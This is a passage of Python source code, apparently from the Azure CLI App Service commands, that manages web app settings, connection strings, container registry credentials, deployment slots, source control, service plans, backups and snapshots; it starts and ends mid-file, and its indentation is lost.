return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise MutuallyExclusiveArgumentError('Usage error: --is-linux and --hyper-v cannot be used together.')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'get_backup_configuration', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
